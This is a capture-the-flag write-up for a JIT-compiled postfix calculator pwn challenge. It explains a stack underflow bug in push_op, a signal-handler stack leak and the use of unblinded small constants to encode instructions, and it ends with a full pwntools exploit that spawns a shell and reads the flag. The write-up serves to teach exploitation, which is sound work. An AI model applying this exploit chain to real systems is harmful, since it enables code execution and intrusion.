Postfix
4 files available
Description
Maths is hard so I made this super-fast JIT-powered calculator. You can even define functions! It has many security features, I bet it's super safe!
Note: A VM is provided to help you replicate the remote setup. Keep in mind that this is NOT a kernel/microarch pwn!
Analysis
Checksec
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
As can be seen, the binary has all the common mitigations enabled.
Seccomp
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x0000000c A = instruction_pointer >> 32
0001: 0x25 0x00 0x01 0x00006000 if (A <= 0x6000) goto 0003
0002: 0x25 0x00 0x01 0x00007000 if (A <= 0x7000) goto 0004
0003: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0004: 0x06 0x00 0x00 0x00000000 return KILL
A simple seccomp filter is also present: it kills any syscall issued from an instruction pointer in the range 0x600000000000 - 0x700000000000.
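The decision logic of the filter can be modelled in a few lines of Python. This is only a sketch of the BPF dump above, and the name seccomp_verdict is made up for illustration. Note that A holds only the upper 32 bits of the instruction pointer, so the comparison works at 4 GiB granularity.

```python
def seccomp_verdict(ip: int) -> str:
    """Mirror the BPF program dumped above (hypothetical helper)."""
    a = (ip >> 32) & 0xFFFFFFFF  # 0000: A = upper 32 bits of the instruction pointer
    if a <= 0x6000:              # 0001: not greater than 0x6000 -> 0003 (ALLOW)
        return "ALLOW"
    if a <= 0x7000:              # 0002: not greater than 0x7000 -> 0004 (KILL)
        return "KILL"
    return "ALLOW"               # fall through to 0003 (ALLOW)


print(seccomp_verdict(0x555555554000))  # address in a typical PIE mapping
print(seccomp_verdict(0x650000000000))  # address inside the JIT region
print(seccomp_verdict(0x7FFFF7A00000))  # address in a typical libc mapping
```

Under this model, syscalls issued from the main binary or from libc are allowed, while a syscall instruction placed in the JIT pages is killed.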
Reversing
The binary allows you to define functions in postfix notation with at most one variable. After being parsed, the functions are JIT-compiled to native x86 code. They can then be called, optionally providing the value of the variable.
Most of the logic happens during the parsing and compilation of the postfix expression.
This starts with the parse(expr_stack_t *out_stack, char *input, char **parsed) function: the string is split into tokens, which then get pushed onto an expr_stack_t structure as a pair of value and type.
When an operator is pushed (through the push_op function) it gets optimized away if the two previous tokens are constants, since the result can be computed at parse-time as it does not depend on other operations or variables.
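The parse-time folding can be illustrated with a small Python sketch. It is not the binary's code: the token representation (pairs such as ("num", 5), ("var", None), ("op", "*")) and the name push_op_folding are assumptions, division is left out for brevity, and only the optimization is shown.

```python
import operator

OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}


def push_op_folding(stack: list, op: str) -> None:
    """Push an operator, folding it when both previous tokens are constants."""
    if len(stack) >= 2 and stack[-1][0] == "num" and stack[-2][0] == "num":
        rhs = stack.pop()[1]
        lhs = stack.pop()[1]
        stack.append(("num", OPS[op](lhs, rhs)))  # computed at parse time
    else:
        stack.append(("op", op))                  # left for the JIT to emit


def parse(expr: str) -> list:
    """Tokenize a postfix expression into (type, value) pairs."""
    stack = []
    for tok in expr.split():
        if tok in OPS:
            push_op_folding(stack, tok)
        elif tok == "x":
            stack.append(("var", None))
        else:
            stack.append(("num", int(tok)))
    return stack


print(parse("2 3 + x *"))
```

In this model "2 3 +" collapses into a single constant, while the multiplication by x stays on the token stack because it depends on the variable.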
The expr_stack_t is then passed to jit_expr, which does the actual translation to x86 code.
A prologue which zeroes all registers and migrates to a separate stack (jit_stk) is generated and it looks like this:
xor eax, eax ; zero all registers except rdi and rsp
xor ebx, ebx
...
wrgsbase rsp ; save rsp for later
mov rsp, jit_stk ; migrate to jit_stk
call actual_jit_code ; call jit code
rdgsbase rsp ; restore rsp
ret
actual_jit_code:
...
The stack is then iterated:
- known values become push operations through the opt_push function, which emits different instructions depending on the size of the value
- variables become push rdi instructions (as the variable is passed through rdi)
- operators are translated roughly to pop rbx; pop rax; add/sub/imul/idiv ...; push rax
The opt_push function also applies constant blinding when a 32-bit or 64-bit constant is pushed, as a mitigation against JIT spraying. This is done by emitting val ^ rnd, where val is the actual value and rnd is a random value generated by the function. An xor operation is then emitted to decrypt this constant at runtime and push it onto the stack.
The generated code might look like this:
; opt_push(0xAAAAAAAA)
mov rax, 0xB00CE592 ; = 0xAAAAAAAA ^ 0x1AA64F38
xor rax, 0x1AA64F38
push rax ; = 0xAAAAAAAA
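The arithmetic behind the blinding can be checked with a short Python sketch. The helper name blind and its parameters are hypothetical, and the use of the secrets module is an assumption: how the binary actually generates rnd is not described here.

```python
import secrets
from typing import Optional, Tuple


def blind(val: int, rnd: Optional[int] = None, bits: int = 32) -> Tuple[int, int]:
    """Return (blinded, rnd) such that blinded ^ rnd == val."""
    mask = (1 << bits) - 1
    if rnd is None:
        rnd = secrets.randbits(bits)  # assumption: any uniform random source
    return (val ^ rnd) & mask, rnd


# Reproduce the constants from the listing above.
blinded, rnd = blind(0xAAAAAAAA, rnd=0x1AA64F38)
print(hex(blinded))                 # immediate stored in the mov
print(hex(blinded ^ rnd))           # value recovered by the xor at runtime
```

Because neither immediate in the emitted code equals the attacker's constant, 32-bit and 64-bit values cannot be used directly to smuggle chosen bytes into the JIT page.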
The final result is then popped through pop rax.
As a final note, the JIT code pages are allocated through jit_init at random offsets in the region 0x600000000000-0x700000000000, which is the same range forbidden by the seccomp filter. The JIT stack is allocated by jit_stk_init at a random offset in the region 0x300000000000-0x400000000000.
Vulnerabilities
Relative RIP control inside the JIT code
The main vulnerability is in the push_op function: it should require two numbers on the stack to apply the operator, but the only check is that the stack contains at least two elements, which might not both be numbers. This allows an attacker to cause a stack underflow which, using the JIT operations, makes it possible to add arbitrary offsets to the return address of the JIT prologue.
An example might be 0 x + + 0, which will add x to the return address. The final constant is required because the code inside parse keeps a variable named count, which tracks the number of elements on the stack at runtime and is checked at the end of the function. If this value is different from 1 (which should be the element returned by the function), the parse function will fail.
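The effect of 0 x + + 0 can be reproduced with a toy model of the JIT stack. The sketch below is a simulation under stated assumptions, not the challenge's code: the stack is a Python list whose bottom element stands for the return address pushed by call actual_jit_code, only + is modelled, and run_jit_model is a hypothetical name.

```python
def run_jit_model(expr: str, x: int, ret_addr: int):
    """Simulate the emitted push/pop sequence.

    Returns (value popped into rax, address used by the final ret).
    """
    stack = [ret_addr]               # pushed by `call actual_jit_code`
    for tok in expr.split():
        if tok == "+":
            rbx = stack.pop()        # pop rbx
            rax = stack.pop()        # pop rax
            stack.append(rax + rbx)  # add rax, rbx; push rax
        elif tok == "x":
            stack.append(x)          # push rdi
        else:
            stack.append(int(tok))   # opt_push(constant)
    result = stack.pop()             # pop rax
    target = stack.pop()             # ret
    return result, target


result, target = run_jit_model("0 x + + 0", x=0x31, ret_addr=0x1000)
print(result, hex(target))
```

In this model the second + consumes the return address as its left operand, so the final ret lands x bytes past the original target, while a well-formed expression such as 1 x + leaves the return address untouched.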
Information leak through the signal handler stack frame
When a division by zero occurs during JIT execution, a SIGFPE signal is raised and a registered signal handler is called. The handler exits gracefully from the JIT area (through a siglongjmp) and informs the user that an error occurred, without crashing the program. Since the handler isn't registered with the SA_ONSTACK flag, when it is invoked during JIT execution it simply uses the JIT stack, spilling its stack frame onto it. This can be used to leak various information, such as a libc address. Keep in mind that the signal handler stack frame has a variable size: it depends on the size of the XSAVE area, which in turn depends on the enabled CPU features (which is why the challenge was run under QEMU). This should not be a problem, since the binary prints CPUID information at startup, including the maximum and actual size of this area.
Exploitation
We can first trigger the leak by doing a division by zero. To get it as close as possible we can abuse the stack underflow caused by the wrong check in push_op.
A payload such as 0 x * * * * / 0 0 0 0 should do the trick. We can play with the number of * and 0 tokens (which must in any case be equal to satisfy the count == 1 constraint) to lower the signal handler stack frame.
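The balancing requirement can be checked offline. The sketch below recomputes the count bookkeeping as described earlier (each value adds one element, each binary operator removes one). The helpers final_count and build_trigger are hypothetical, and the real parse function may track more state than this.

```python
OPERATORS = {"+", "-", "*", "/"}


def final_count(expr: str) -> int:
    """Net number of runtime stack elements left by a postfix expression."""
    count = 0
    for tok in expr.split():
        count += -1 if tok in OPERATORS else 1
    return count


def build_trigger(n: int) -> str:
    """n extra '*' operators before the division, balanced by n trailing zeros."""
    return "0 x " + "* " * n + "/ " + "0 " * n


print(final_count("0 x * * * * / 0 0 0 0"))
print(final_count(build_trigger(10)))
```

Any n keeps the final count at 1 in this model, which is why the number of extra operators can be tuned freely as long as the same number of constants is appended.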
Since we can't really pop values from the stack arbitrarily, we'll have to abuse the relative RIP control to try and move the stack pointer near a libc leak. We can then add a relative offset to this leak to get a one-gadget, which will give us a shell when the code returns. We can abuse the fact that 8-bit and 16-bit values are not blinded to try and encode instructions. Furthermore, 16-bit values still use a 32-bit push instruction, causing them to be sign-extended. I found the enter instruction to be particularly useful, since it allows us to move the stack pointer and we can encode it by pushing 0xXXC8, where XX is the number of bytes by which the stack pointer will be moved. As long as XX is less than 0x7F, the sign bit is clear, so the value is effectively zero-extended and encodes an enter XX, 0 instruction, which will decrement the stack pointer by XX.
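The byte-level trick can be verified with a short Python sketch. It assumes that the 32-bit push is emitted in the push imm32 form (opcode 0x68), which the text does not state explicitly; push_bytes and enter_constant are hypothetical helper names.

```python
import struct

PUSH_IMM32 = 0x68  # opcode of `push imm32` (assumed form of the emitted push)
ENTER = 0xC8       # opcode of `enter imm16, imm8`


def push_bytes(value: int) -> bytes:
    """Machine code of `push imm32` for a non-negative 32-bit immediate."""
    return bytes([PUSH_IMM32]) + struct.pack("<I", value)


def enter_constant(frame_size: int) -> int:
    """Constant whose little-endian bytes decode as `enter frame_size, 0`."""
    assert 0 <= frame_size < 0x7F  # bound stated in the text
    return (frame_size << 8) | ENTER


code = push_bytes(enter_constant(0x60))
print(code.hex())      # full push instruction
print(code[1:].hex())  # same bytes when execution starts one byte later
```

Skipping the first byte turns the immediate c8 60 00 00 into enter 0x60, 0. On x86-64 this instruction pushes rbp, copies rsp into rbp and then subtracts 0x60 from rsp, so rbp is clobbered as a side effect.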
Using this we can reach a libc address and change it to a one-gadget. We can then push one value (the JIT will need to pop a return value) and at the ret instruction we'll get a shell. A payload for this might be x 0 * x - {rsp_offset << 8 | 0xc8} - {SPRAYED_INSN_OFFSET} + + {rsp_offset << 8 | 0xc8} x + + 0, where x is the value to be added to the libc pointer.
Exploit
#!/usr/bin/env python3
from pwn import *

HOST = args.HOST if args.HOST else "localhost"
PORT = int(args.PORT) if args.PORT else 1337


def conn():
    r = remote(HOST, PORT)
    return r


def create_func(func_id, expr):
    # Define a new function from a postfix expression
    r.sendafter(b"> ", b"c\n")
    r.sendafter(b"id: ", func_id.encode() + b"\n")
    r.sendafter(b">>> ", expr.encode() + b"\n")


def execute_func(func_id, arg, get_res=False):
    # Call a previously defined function with the given argument
    r.sendafter(b"> ", b"x\n")
    r.sendafter(b"id: ", func_id.encode() + b"\n")
    r.sendafter(b": ", arg.encode() + b"\n")
    if get_res:
        r.recvuntil(b"result: ")
        return int(r.recvline().decode().strip())


def main():
    global r
    r = conn()

    # Parse the XSAVE area size from the CPUID banner
    r.recvuntil(b"supported features: " + context.newline)
    r.recvlines(4)
    xsave_size = int(r.recvline().split(b" ")[1], 16)
    log.info(f"xsave_max_size: {hex(xsave_size)}")

    # 0xebcf8 execve("/bin/sh", rsi, rdx)
    # constraints:
    # address rbp-0x78 is writable
    # [rsi] == NULL || rsi == NULL
    # [rdx] == NULL || rdx == NULL
    CODE_OFFSET = 49

    trigger_sighandler = "0 x " + ("* " * (xsave_size//8 - 7)) + "/ " + ("0 " * (xsave_size//8 - 7))
    payload = f"x 0 * x - {0x60c8} - {CODE_OFFSET} + + {0x60c8} x + + 0"

    # Spill the signal handler frame (and a libc pointer) onto the JIT stack
    create_func("DIV0", trigger_sighandler)
    execute_func("DIV0", "0")

    # <__execvpe+1144>: lea rdi,[rip+0xec999]
    one_gadget_addr = 0xebcf8
    log.info(f"one_gadget_addr: {hex(one_gadget_addr)}")

    # <_IO_2_1_stdin_+131>: 0x00000000
    sighandler_leak_addr = 0x219b23
    log.info(f"sighandler_leak_addr: {hex(sighandler_leak_addr)}")

    offset = sighandler_leak_addr - one_gadget_addr
    log.info(f"offset: {hex(offset)}")

    # Turn the leaked libc pointer into the one-gadget and return to it
    create_func("PWN", payload)
    execute_func("PWN", str(-offset))

    r.sendline(b"cat flag.txt")
    log.info(r.recvregex(b"snakeCTF{.*}", timeout=5).strip().split(context.newline)[-1].decode())
    r.close()


if __name__ == "__main__":
    main()